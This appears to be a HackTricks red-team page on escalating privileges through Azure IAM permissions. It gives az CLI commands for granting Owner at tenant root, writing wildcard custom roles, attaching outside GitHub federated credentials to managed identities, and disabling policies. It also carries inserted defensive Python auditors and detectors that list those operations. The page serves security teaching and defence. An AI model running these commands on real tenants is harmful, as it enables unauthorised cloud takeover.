Az - Azure IAM Privesc (Authorization)

Tip

Learn & practice AWS Hacking: HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Learn & practice Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

Azure IAM

For more information check:

Az - Entra ID (AzureAD) & Azure IAM

Microsoft.Authorization/roleAssignments/write

This permission allows assigning roles to principals within a given scope, so an attacker can escalate privileges by granting themselves a more privileged role:

# Example
az role assignment create --role Owner --assignee "24efe8cf-c59e-45c2-a5c7-c7e552a07170" --scope "/subscriptions/9291ff6e-6afb-430e-82a4-6f04b2d05c7f/resourceGroups/Resource_Group_1/providers/Microsoft.KeyVault/vaults/testing-1231234"

Microsoft.Authorization/roleDefinitions/Write

This permission allows modifying the permissions granted to a role, so an attacker can escalate privileges by giving a role they already hold more permissions.

Create a file role.json with the following content:

{
  "roleName": "<name of the role>",
  "Name": "<name of the role>",
  "IsCustom": true,
  "Description": "Custom role with elevated privileges",
  "Actions": ["*"],
  "NotActions": [],
  "DataActions": ["*"],
  "NotDataActions": [],
  "AssignableScopes": ["/subscriptions/<subscription-id>"],
  "id": "/subscriptions/<subscription-id>/providers/Microsoft.Authorization/roleDefinitions/<role-id>"
}

Then update the role permissions with the previous definition by calling:

az role definition update --role-definition role.json
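The check a defender wants on the other side of this technique, as an added example that is not part of the original page: given a role definition JSON in the shape of the role.json above, compute the role's effective actions (Actions minus NotActions, with ARM's case-insensitive `*` wildcard that spans `/` separators) and report whether they include any of the authorization-changing actions covered on this page, plus wildcard actions and tenant- or management-group-wide assignable scopes. The three sample definitions and their placeholder ids are constructed for the example.

```python
import fnmatch
import json

# Actions covered on this page: each lets its holder change who may do what.
PRIVESC_ACTIONS = (
    "Microsoft.Authorization/roleAssignments/write",
    "Microsoft.Authorization/roleDefinitions/write",
    "Microsoft.Authorization/elevateAccess/action",
    "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write",
    "Microsoft.Authorization/policyAssignments/write",
    "Microsoft.Authorization/policyAssignments/delete",
    "Microsoft.Authorization/policyDefinitions/write",
    "Microsoft.Management/managementGroups/write",
    "Microsoft.Management/managementGroups/subscriptions/write",
)

# Constructed sample definitions (placeholder subscription id, not real tenants).
WILDCARD_ROLE_JSON = json.dumps({
    "Name": "custom-elevated", "IsCustom": True,
    "Actions": ["*"], "NotActions": [],
    "DataActions": ["*"], "NotDataActions": [],
    "AssignableScopes": ["/"],
})
CONTRIBUTOR_LIKE_JSON = json.dumps({
    "Name": "contributor-like", "IsCustom": True,
    "Actions": ["*"],
    "NotActions": ["Microsoft.Authorization/*/Delete",
                   "Microsoft.Authorization/*/Write",
                   "Microsoft.Authorization/elevateAccess/Action"],
    "DataActions": [], "NotDataActions": [],
    "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000000"],
})
READER_LIKE_JSON = json.dumps({
    "Name": "reader-like", "IsCustom": True,
    "Actions": ["*/read"], "NotActions": [],
    "DataActions": [], "NotDataActions": [],
    "AssignableScopes": ["/subscriptions/00000000-0000-0000-0000-000000000000"],
})


def _matches(pattern, action):
    # ARM action strings are case-insensitive and '*' also spans '/' separators,
    # which is exactly how fnmatch treats '*'.
    return fnmatch.fnmatchcase(action.lower(), pattern.lower())


def action_allowed(role, action):
    # Effective permission: matched by some Actions entry and by no NotActions entry.
    allowed = any(_matches(p, action) for p in role.get("Actions", []))
    denied = any(_matches(p, action) for p in role.get("NotActions", []))
    return allowed and not denied


def audit_role_definition(role_json):
    role = json.loads(role_json)
    findings = []
    if any(p.strip() == "*" for p in role.get("Actions", [])):
        findings.append("wildcard-actions")
    if any(p.strip() == "*" for p in role.get("DataActions", [])):
        findings.append("wildcard-data-actions")
    granted = [a for a in PRIVESC_ACTIONS if action_allowed(role, a)]
    if granted:
        findings.append("grants-privesc-actions")
    for scope in role.get("AssignableScopes", []):
        # '/' is the tenant root; management-group scopes cascade to every child subscription.
        if scope == "/" or scope.startswith("/providers/Microsoft.Management/managementGroups/"):
            findings.append("tenant-or-mg-wide-assignable-scope")
            break
    return {"name": role.get("Name") or role.get("roleName"),
            "findings": findings, "privesc_actions": granted}


if __name__ == "__main__":
    for sample in (WILDCARD_ROLE_JSON, CONTRIBUTOR_LIKE_JSON, READER_LIKE_JSON):
        print(json.dumps(audit_role_definition(sample), indent=2))
```

Feed it the output of `az role definition list --custom-role-only true` one definition at a time; the contributor-like sample shows why NotActions matter: its `*` still reaches federated credential and management group writes even though the Microsoft.Authorization writes are excluded.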

Microsoft.Authorization/elevateAccess/action

This permission allows elevating privileges so the caller can grant permissions to any principal over Azure resources. It is intended for Entra ID Global Administrators so that they can also manage permissions over Azure resources.

Tip

I think the user needs to be a Global Administrator in Entra ID for the elevate call to work.

# Call elevate
az rest --method POST --uri "https://management.azure.com/providers/Microsoft.Authorization/elevateAccess?api-version=2016-07-01"

# Grant a user the Owner role
az role assignment create --assignee "<object-id>" --role "Owner" --scope "/"

Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write

This permission allows adding federated credentials to managed identities, for example giving a GitHub Actions workflow in a repo access to a managed identity. It therefore allows obtaining access to any user-assigned managed identity.

Example command to give a GitHub repo access to a managed identity:

# Generic example:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/<subscription-id>/resourceGroups/<res-group>/providers/Microsoft.ManagedIdentity/userAssignedIdentities/<managed-identity-name>/federatedIdentityCredentials/<name-new-federated-creds>?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:<org-name>/<repo-name>:ref:refs/heads/<branch-name>","audiences":["api://AzureADTokenExchange"]}}'

# Example with specific data:
az rest --method PUT \
--uri "https://management.azure.com/subscriptions/92913047-10a6-2376-82a4-6f04b2d03798/resourceGroups/Resource_Group_1/providers/Microsoft.ManagedIdentity/userAssignedIdentities/funcGithub-id-913c/federatedIdentityCredentials/CustomGH2?api-version=2023-01-31" \
--headers "Content-Type=application/json" \
--body '{"properties":{"issuer":"https://token.actions.githubusercontent.com","subject":"repo:carlospolop/azure_func4:ref:refs/heads/main","audiences":["api://AzureADTokenExchange"]}}'
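An audit of the federated credentials already attached to an identity against an owner-maintained allowlist, as an added example that is not part of the original page. It assumes a listing whose entries carry the same `properties.issuer` / `properties.subject` / `properties.audiences` fields as the PUT body above (a GET on the same `federatedIdentityCredentials` collection returns them under `value`); the sample listing, the allowlist and the `example-org` names are constructed.

```python
import json
import re

# Constructed listing: the credential expected by the identity's owners, one
# pointing at a repo outside the organisation, and one from an unknown issuer.
SAMPLE_FIC_LIST = json.dumps({"value": [
    {"name": "expected-deploy", "properties": {
        "issuer": "https://token.actions.githubusercontent.com",
        "subject": "repo:example-org/infra:ref:refs/heads/main",
        "audiences": ["api://AzureADTokenExchange"]}},
    {"name": "CustomGH2", "properties": {
        "issuer": "https://token.actions.githubusercontent.com",
        "subject": "repo:someone-else/azure_func4:ref:refs/heads/main",
        "audiences": ["api://AzureADTokenExchange"]}},
    {"name": "k8s", "properties": {
        "issuer": "https://oidc.example.invalid/cluster",
        "subject": "system:serviceaccount:ci:runner",
        "audiences": ["api://AzureADTokenExchange"]}},
]})

# Allowlist (assumed to be maintained by the identity's owners): per trusted
# issuer, the subject patterns that may exchange tokens for this identity.
ALLOWED_SUBJECTS = {
    "https://token.actions.githubusercontent.com": [
        re.compile(r"^repo:example-org/[^:]+:(ref:refs/heads/main|environment:prod)$"),
    ],
}
EXPECTED_AUDIENCE = "api://AzureADTokenExchange"


def parse_github_subject(subject):
    # GitHub OIDC subjects look like repo:<org>/<repo>:<claim-type>:<claim-value>.
    m = re.match(r"^repo:([^/]+)/([^:]+):([^:]+):(.*)$", subject)
    if not m:
        return None
    org, repo, kind, value = m.groups()
    return {"org": org, "repo": repo, "kind": kind, "value": value}


def audit_federated_credentials(listing_json, allowed=ALLOWED_SUBJECTS):
    """Return (credential name, finding, detail) for every credential that
    lets a principal outside the allowlist obtain this identity's tokens."""
    findings = []
    for cred in json.loads(listing_json).get("value", []):
        props = cred.get("properties", {})
        issuer, subject = props.get("issuer", ""), props.get("subject", "")
        if EXPECTED_AUDIENCE not in props.get("audiences", []):
            findings.append((cred["name"], "unexpected-audience", props.get("audiences")))
        if issuer not in allowed:
            findings.append((cred["name"], "unknown-issuer", issuer))
            continue
        if not any(rx.match(subject) for rx in allowed[issuer]):
            findings.append((cred["name"], "subject-not-allowlisted", subject))
    return findings


if __name__ == "__main__":
    for name, finding, detail in audit_federated_credentials(SAMPLE_FIC_LIST):
        print(f"{name}: {finding} ({detail})")
```

Run it over each user-assigned identity's credential listing; every hit is a token-exchange path that the identity's owners did not sanction, which is precisely what the write permission above lets an attacker add.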

Microsoft.Authorization/policyAssignments/write | Microsoft.Authorization/policyAssignments/delete

An attacker with the permission Microsoft.Authorization/policyAssignments/write or Microsoft.Authorization/policyAssignments/delete over a management group, subscription, or resource group can modify or delete Azure policy assignments, and so disable the security restrictions that block specific activities.

This gives access to resources or capabilities that were previously protected by the policy.

Delete a policy assignment:

az policy assignment delete \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Disable a policy assignment:

az policy assignment update \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>" \
--enforcement-mode Disabled

Verify the changes:

# List policy assignments
az policy assignment list \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

# Show specific policy assignment details
az policy assignment show \
--name "<policyAssignmentName>" \
--scope "/providers/Microsoft.Management/managementGroups/<managementGroupId>"

Microsoft.Authorization/policyDefinitions/write

An attacker with the permission Microsoft.Authorization/policyDefinitions/write can modify Azure policy definitions, changing the rules that enforce security restrictions in the environment.

For example, a policy that restricts the regions allowed for resource creation can be changed to allow any region, or the policy's effect can be changed so that it no longer does anything.

Modify a policy definition:

az policy definition update \
--name "<policyDefinitionName>" \
--rules @updated-policy-rules.json

Verify the changes:

az policy definition list --output table

az policy definition show --name "<policyDefinitionName>"

Microsoft.Management/managementGroups/write

An attacker with the permission Microsoft.Management/managementGroups/write can change the management group hierarchy or create new management groups, and so bypass strict policies set at higher levels.

For example, an attacker can create a new management group without strict policies and then move subscriptions into that group.

Create a new management group:

az account management-group create \
--name "yourMGname" \
--display-name "yourMGDisplayName"

Modify the management group hierarchy:

az account management-group update \
--name "<managementGroupId>" \
--parent "/providers/Microsoft.Management/managementGroups/<parentGroupId>"

Verify the changes:

az account management-group list --output table

az account management-group show \
--name "<managementGroupId>" \
--expand

Microsoft.Management/managementGroups/subscriptions/write

An attacker with the permission Microsoft.Management/managementGroups/subscriptions/write can move subscriptions between management groups, and so evade restrictive policies by moving a subscription to a group with fewer or no policies.

Move a subscription to a different management group:

az account management-group subscription add \
--name "<managementGroupName>" \
--subscription "<subscriptionId>"

Verify the changes:

az account management-group subscription show \
--name "<managementGroupId>" \
--subscription "<subscriptionId>"
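Detection covering every operation on this page, as an added example that is not part of the original page: it walks Activity Log records, keeps successful calls to the listed operations, and escalates a roleAssignments/write that targets the tenant root scope or that follows an elevateAccess call by the same caller within a short window (the elevate-then-assign sequence shown above). The record layout (`operationName.value`, `status.value`, `caller`, `eventTimestamp`, `resourceId`) is assumed to follow the JSON printed by `az monitor activity-log list`; adjust the accessors for other exports. The sample records and their placeholder ids are constructed.

```python
import json
from datetime import datetime, timedelta

# Operations from this page, each with a base severity for the alert.
PRIVESC_OPERATIONS = {
    "Microsoft.Authorization/roleAssignments/write": "high",
    "Microsoft.Authorization/roleDefinitions/write": "high",
    "Microsoft.Authorization/elevateAccess/action": "critical",
    "Microsoft.ManagedIdentity/userAssignedIdentities/federatedIdentityCredentials/write": "high",
    "Microsoft.Authorization/policyAssignments/write": "medium",
    "Microsoft.Authorization/policyAssignments/delete": "high",
    "Microsoft.Authorization/policyDefinitions/write": "medium",
    "Microsoft.Management/managementGroups/write": "medium",
    "Microsoft.Management/managementGroups/subscriptions/write": "high",
}

# Constructed sample records (placeholder ids; "Failed" and read-only calls are noise).
SAMPLE_EVENTS = json.dumps([
    {"eventTimestamp": "2024-05-01T10:00:00Z", "caller": "alice@example.invalid",
     "operationName": {"value": "Microsoft.Authorization/elevateAccess/action"},
     "status": {"value": "Succeeded"},
     "resourceId": "/providers/Microsoft.Authorization/elevateAccess"},
    {"eventTimestamp": "2024-05-01T10:04:00Z", "caller": "alice@example.invalid",
     "operationName": {"value": "Microsoft.Authorization/roleAssignments/write"},
     "status": {"value": "Succeeded"},
     "resourceId": "/providers/Microsoft.Authorization/roleAssignments/aaaaaaaa-0000-0000-0000-000000000001"},
    {"eventTimestamp": "2024-05-01T11:00:00Z", "caller": "bob@example.invalid",
     "operationName": {"value": "Microsoft.Authorization/policyAssignments/delete"},
     "status": {"value": "Succeeded"},
     "resourceId": "/providers/Microsoft.Management/managementGroups/mg-root/providers/Microsoft.Authorization/policyAssignments/deny-public-ip"},
    {"eventTimestamp": "2024-05-01T11:30:00Z", "caller": "carol@example.invalid",
     "operationName": {"value": "Microsoft.Authorization/roleAssignments/write"},
     "status": {"value": "Failed"},
     "resourceId": "/subscriptions/00000000-0000-0000-0000-000000000000/providers/Microsoft.Authorization/roleAssignments/aaaaaaaa-0000-0000-0000-000000000002"},
    {"eventTimestamp": "2024-05-01T12:00:00Z", "caller": "dave@example.invalid",
     "operationName": {"value": "Microsoft.Compute/virtualMachines/read"},
     "status": {"value": "Succeeded"},
     "resourceId": "/subscriptions/00000000-0000-0000-0000-000000000000/resourceGroups/rg1/providers/Microsoft.Compute/virtualMachines/vm1"},
])


def _ts(value):
    return datetime.fromisoformat(value.replace("Z", "+00:00"))


def assignment_scope(resource_id):
    """Scope a role assignment applies to: everything before the
    /providers/Microsoft.Authorization/roleAssignments/<id> tail, '/' for tenant root."""
    marker = "/providers/Microsoft.Authorization/roleAssignments/"
    return resource_id.split(marker, 1)[0] or "/"


def detect_privesc(events_json, window=timedelta(minutes=30)):
    events = sorted(json.loads(events_json), key=lambda e: _ts(e["eventTimestamp"]))
    alerts = []
    last_elevate = {}  # caller -> time of their last successful elevateAccess
    for e in events:
        op = e["operationName"]["value"]
        if op not in PRIVESC_OPERATIONS or e["status"]["value"] != "Succeeded":
            continue
        caller, ts = e["caller"], _ts(e["eventTimestamp"])
        severity, rule = PRIVESC_OPERATIONS[op], op
        if op == "Microsoft.Authorization/elevateAccess/action":
            last_elevate[caller] = ts
        elif op == "Microsoft.Authorization/roleAssignments/write":
            if assignment_scope(e["resourceId"]) == "/":
                severity, rule = "critical", "root-scope-role-assignment"
            if caller in last_elevate and ts - last_elevate[caller] <= window:
                severity, rule = "critical", "elevate-then-assign"
        alerts.append({"time": e["eventTimestamp"], "caller": caller,
                       "operation": op, "severity": severity, "rule": rule})
    return alerts


if __name__ == "__main__":
    for alert in detect_privesc(SAMPLE_EVENTS):
        print(json.dumps(alert))
```

Routing the Activity Log to a Log Analytics workspace gives the same fields under other names (OperationNameValue, ActivityStatusValue, Caller); the correlation logic is unchanged, and the elevate-then-assign pairing is the signal to treat as an incident rather than a ticket.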
